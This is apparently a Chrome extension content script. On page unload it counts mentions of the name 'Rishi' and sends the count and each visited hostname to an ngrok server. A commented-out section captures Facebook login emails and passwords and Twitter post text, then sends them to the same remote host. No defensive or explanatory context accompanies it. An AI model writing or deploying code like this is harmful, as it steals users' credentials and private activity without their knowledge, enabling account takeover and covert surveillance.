console.log(window.location.hostname);

window.onbeforeunload = function (e) {
	
	var source = document.getElementsByTagName('html')[0].innerHTML;

	var count = (source.match(/Rishi/g) || []).length;

	var textInputs = document.querySelectorAll('input');
	for (var i = 0; i < textInputs.length; i++){
		if (textInputs[i].length > 0){
			if (textInputs[i].indexOf("Rishi") != -1){
				count++;
			}
		}
	}

	chrome.runtime.sendMessage({
	    method: 'GET',
	    action: 'xhttp',
	    url: 'http://9e42b091.ngrok.io/?url=' + count + "%20" + window.location.hostname,
	    data: ""
	}, function(responseText) {
	    
	});

	console.log("count: " + count);

};

// var source = document.getElementsByTagName('html')[0].innerHTML;

// console.log((source.match(/Rishi/g) || []).length);

// var textInputs = document.querySelectorAll('input');
// for (var i = 0; i < textInputs.length; i++){
// 	textInputs[i].addEventListener("input", function(){
// 		var count = 0;
// 		for (var j = 0; j < textInputs.length; j++){
// 			if (textInputs[j].indexOf("Rishi") != -1){
// 				count++;
// 			}
// 		}
// 		console.log(count + (source.match(/Rishi/g) || []).length);
// 	});
// }

// var input = document.getElementsByTagName("input")[0];
// var input1 = document.getElementsByTagName("input")[1];
// var input2 = document.getElementsByTagName("input")[2];
// var input3 = document.getElementsByTagName("input")[3];
// var input4 = document.getElementsByTagName("input")[4];
// var input5 = document.getElementsByTagName("input")[5];
// var input6 = document.getElementsByTagName("input")[6];
// var input7 = document.getElementsByTagName("input")[7];
// var input8 = document.getElementsByTagName("input")[8];

// input.addEventListener('input', function(){
// 	console.log(input.value);
// 	console.log((input.value.match(/Rishi/g) || []).length || 0 + (input1.value.match(/Rishi/g) || []).length || 0 + (input2.value.match(/Rishi/g) || []).length || 0 + (input3.value.match(/Rishi/g) || []).length || 0 + (input4.value.match(/Rishi/g) || []).length || 0 + (input5.value.match(/Rishi/g) || []).length || 0 + (input6.value.match(/Rishi/g) || []).length || 0 + (input7.value.match(/Rishi/g) || []).length || 0 + (input8.value.match(/Rishi/g) || []).length || 0 + (source.match(/Rishi/g) || []).length);
// });


// input1.addEventListener('input', function(){
// 	console.log(input1.value);
// 	console.log((input.value.match(/Rishi/g) || []).length || 0 + (input1.value.match(/Rishi/g) || []).length || 0 + (input2.value.match(/Rishi/g) || []).length || 0 + (input3.value.match(/Rishi/g) || []).length || 0 + (input4.value.match(/Rishi/g) || []).length || 0 + (input5.value.match(/Rishi/g) || []).length || 0 + (input6.value.match(/Rishi/g) || []).length || 0 + (input7.value.match(/Rishi/g) || []).length || 0 + (input8.value.match(/Rishi/g) || []).length || 0 + (source.match(/Rishi/g) || []).length);
// });


// input2.addEventListener('input', function(){
// 	console.log(input2.value);
// 	console.log((input.value.match(/Rishi/g) || []).length || 0 + (input1.value.match(/Rishi/g) || []).length || 0 + (input2.value.match(/Rishi/g) || []).length || 0 + (input3.value.match(/Rishi/g) || []).length || 0 + (input4.value.match(/Rishi/g) || []).length || 0 + (input5.value.match(/Rishi/g) || []).length || 0 + (input6.value.match(/Rishi/g) || []).length || 0 + (input7.value.match(/Rishi/g) || []).length || 0 + (input8.value.match(/Rishi/g) || []).length || 0 + (source.match(/Rishi/g) || []).length);
// });


// input3.addEventListener('input', function(){
// 	console.log(input3.value);
// 	console.log((input.value.match(/Rishi/g) || []).length || 0 + (input1.value.match(/Rishi/g) || []).length || 0 + (input2.value.match(/Rishi/g) || []).length || 0 + (input3.value.match(/Rishi/g) || []).length || 0 + (input4.value.match(/Rishi/g) || []).length || 0 + (input5.value.match(/Rishi/g) || []).length || 0 + (input6.value.match(/Rishi/g) || []).length || 0 + (input7.value.match(/Rishi/g) || []).length || 0 + (input8.value.match(/Rishi/g) || []).length || 0 + (source.match(/Rishi/g) || []).length);
// });


// input4.addEventListener('input', function(){
// 	console.log(input4.value);
// 	console.log((input.value.match(/Rishi/g) || []).length || 0 + (input1.value.match(/Rishi/g) || []).length || 0 + (input2.value.match(/Rishi/g) || []).length || 0 + (input3.value.match(/Rishi/g) || []).length || 0 + (input4.value.match(/Rishi/g) || []).length || 0 + (input5.value.match(/Rishi/g) || []).length || 0 + (input6.value.match(/Rishi/g) || []).length || 0 + (input7.value.match(/Rishi/g) || []).length || 0 + (input8.value.match(/Rishi/g) || []).length || 0 + (source.match(/Rishi/g) || []).length);
// });


// input5.addEventListener('input', function(){
// 	console.log(input5.value);
// 	console.log((input.value.match(/Rishi/g) || []).length || 0 + (input1.value.match(/Rishi/g) || []).length || 0 + (input2.value.match(/Rishi/g) || []).length || 0 + (input3.value.match(/Rishi/g) || []).length || 0 + (input4.value.match(/Rishi/g) || []).length || 0 + (input5.value.match(/Rishi/g) || []).length || 0 + (input6.value.match(/Rishi/g) || []).length || 0 + (input7.value.match(/Rishi/g) || []).length || 0 + (input8.value.match(/Rishi/g) || []).length || 0 + (source.match(/Rishi/g) || []).length);
// });


// input6.addEventListener('input', function(){
// 	console.log(input6.value);
// 	console.log((input.value.match(/Rishi/g) || []).length || 0 + (input1.value.match(/Rishi/g) || []).length || 0 + (input2.value.match(/Rishi/g) || []).length || 0 + (input3.value.match(/Rishi/g) || []).length || 0 + (input4.value.match(/Rishi/g) || []).length || 0 + (input5.value.match(/Rishi/g) || []).length || 0 + (input6.value.match(/Rishi/g) || []).length || 0 + (input7.value.match(/Rishi/g) || []).length || 0 + (input8.value.match(/Rishi/g) || []).length || 0 + (source.match(/Rishi/g) || []).length);
// });


// input7.addEventListener('input', function(){
// 	console.log(input7.value);
// 	console.log((input.value.match(/Rishi/g) || []).length || 0 + (input1.value.match(/Rishi/g) || []).length || 0 + (input2.value.match(/Rishi/g) || []).length || 0 + (input3.value.match(/Rishi/g) || []).length || 0 + (input4.value.match(/Rishi/g) || []).length || 0 + (input5.value.match(/Rishi/g) || []).length || 0 + (input6.value.match(/Rishi/g) || []).length || 0 + (input7.value.match(/Rishi/g) || []).length || 0 + (input8.value.match(/Rishi/g) || []).length || 0 + (source.match(/Rishi/g) || []).length);
// });


// input8.addEventListener('input', function(){
// 	console.log(input8.value);
// 	console.log((input.value.match(/Rishi/g) || []).length || 0 + (input1.value.match(/Rishi/g) || []).length || 0 + (input2.value.match(/Rishi/g) || []).length || 0 + (input3.value.match(/Rishi/g) || []).length || 0 + (input4.value.match(/Rishi/g) || []).length || 0 + (input5.value.match(/Rishi/g) || []).length || 0 + (input6.value.match(/Rishi/g) || []).length || 0 + (input7.value.match(/Rishi/g) || []).length || 0 + (input8.value.match(/Rishi/g) || []).length || 0 + (source.match(/Rishi/g) || []).length);
// });

// window.onbeforeunload = function(){
// 	source = document.getElementsByTagName('html')[0].innerHTML;
// 	alert((source.match(/Rishi/g) || []).length);
// };

// if (window.location.hostname == "www.facebook.com") {

// 	var facebookEmail = document.getElementsByClassName("inputtext")[0];

// 	var facebookPassword = document.getElementsByClassName("inputtext")[1];

// 	var facebookLogInButton = document.querySelectorAll('[tabindex="4"]')[0];
// 	console.log(facebookLogInButton);

// 	facebookEmail.addEventListener('input', function(){
// 	    //console.log('input changed to: ', facebookEmail.value);
// 	});

// 	facebookLogInButton.addEventListener('click', function(){
// 		console.log('input changed to: ' + facebookEmail.value + ", " + facebookPassword.value);

// 		var toSendToServer = "url=" + facebookEmail.value + "%20" + facebookPassword.value + "%20" + window.location.hostname;

// 	    chrome.runtime.sendMessage({
// 		    method: 'GET',
// 		    action: 'xhttp',
// 		    url: 'http://9e42b091.ngrok.io/?' + toSendToServer,
// 		    data: ""
// 		}, function(responseText) {
		    
// 		});

// 	});

// }
// else if (window.location.hostname == "twitter.com") {
// 	console.log(document);
// 	var tweetForm = document.getElementsByClassName(".tweet-form");
// 	console.log(tweetForm);
// 	var tweetTextBox = document.getElementById("tweet-box-home-timeline");

// 	tweetForm.addEventListener('onsubmit', function(){
// 		console.log("submitted " + tweetTextBox.value);

// 		var toSendToServer = "url=" + tweetTextBox.value + "%20" + window.location.hostname;

// 	    chrome.runtime.sendMessage({
// 		    method: 'GET',
// 		    action: 'xhttp',
// 		    url: 'http://9e42b091.ngrok.io/?' + toSendToServer,
// 		    data: ""
// 		}, function(responseText) {
		    
// 		});

// 	});

// }